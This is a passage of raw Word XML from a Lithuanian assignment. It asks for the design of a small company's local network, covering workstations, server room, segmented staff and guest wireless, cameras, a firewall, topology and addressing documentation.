        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sudarykite lokalų kompiuterių tinklą įmonės patalpose (žiūrėti</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> į apačioje pateiktą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">patalpų planą). Suplanuokite tinklo topologiją, parinkite reikalingą įrangą, technologijas, </w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pateikite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>reikalingus techninius sprendimus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF3D98" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="55133B0D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E6D513B" wp14:editId="6EC39231">
            <wp:extent cx="5752463" cy="3655121"/>
            <wp:effectExtent l="0" t="0" r="635" b="254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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5752463" cy="3655121"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADACDF5" w14:textId="3625A900" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00A279B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Patalpų planas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BEC65" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4"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6548C7F7" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įmonės poreikiai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C3070" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Infrastruktūra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B0D22" w14:textId="58136F7D" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>15 kompiuterizuotų darbo vietų</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4043A007" w14:textId="7CA8F8BB" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Komunikacinės įrangos patalpa (serverinė)</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5EFBBD" w14:textId="795B1478" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3 kompiuterizuoti susitikimų kambariai</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC81A3" w14:textId="362D2738" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 konferencijų kambarys</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F362D58" w14:textId="23E96F86" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bevielis ryšys</w:t>
      </w:r>
      <w:r w:rsidR="006479E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00641CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>visuose</w:t>
      </w:r>
      <w:r w:rsidR="006479E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> patalp</w:t>
      </w:r>
      <w:r w:rsidR="00641CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ose</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C766EBA" w14:textId="127473C8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2 daugiafunkciai įrenginiai centralizuotam spausdinimui</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36827C76" w14:textId="56E3F4A5" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5 stebėjimo kameros apsaugos sistemai</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ED78C2" w14:textId="4D68342E" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Funkciniai</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> poreikiai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E85AB" w14:textId="14AE9729" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo vietos prie interneto prijungtos laidu</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9AA6C5" w14:textId="08E9C6B5" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbuotojų ir svečių ar kiti bevieliai tinklai logiškai atskirti</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FCAF82" w14:textId="0B78B3D2" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbuotojai suskirstyti į mažesnius tinklus pagal darbo grupes (pvz.: administracija, vadyba, marketingas, IT skyrius)</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5BCD5" w14:textId="3515C8C5" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Tinkle pasiekiamas serveris įvairioms paslaugoms</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A1079" w14:textId="4D61AE04" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Bevielių tinklų, apsaugos sistemų valdymas</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įgyvendintas atskirtoje aplinkoje</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6A44F" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Tinklo apsaugai naudojama tinklinė ugniasienė.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA46EF" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D802FAB" w14:textId="4EFBF168" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="0085341D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Reikia atlikti šiuos darbus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B17BE0" w14:textId="061C35FB" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Parinkti ir dokumentuoti tinklo techninę įrangą</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA2887" w14:textId="1BD9517F" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Parinkti ir dokumentuoti darbo vietų, paslaugų techninę įrangą</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2188F4" w14:textId="696211A1" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Parinkti ir dokumentuoti reikalingą programinę įrangą</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FBE2D" w14:textId="4C3B64A1" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sudaryti planuojamo tinklo topologiją. Nubraižyti fizinę ir logines topologijas, paruošti topologijos dokumentaciją</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F8D68" w14:textId="45F128FA" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudaryti ir dokumentuoti tinklų adresų pasiskirstymą, reikalingus technologinius sprendimus tinklo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>valdymui</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14608615" w14:textId="434FC47F" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Numatyti ir dokumentuoti bevielių tinklų pavadinimus ir prisijungimo galimybes</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5604890D" w14:textId="2815056E" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sudaryti ir dokumentuoti vaizdo stebėjimo sistemą</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070AA51F" w14:textId="0E3F6077" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
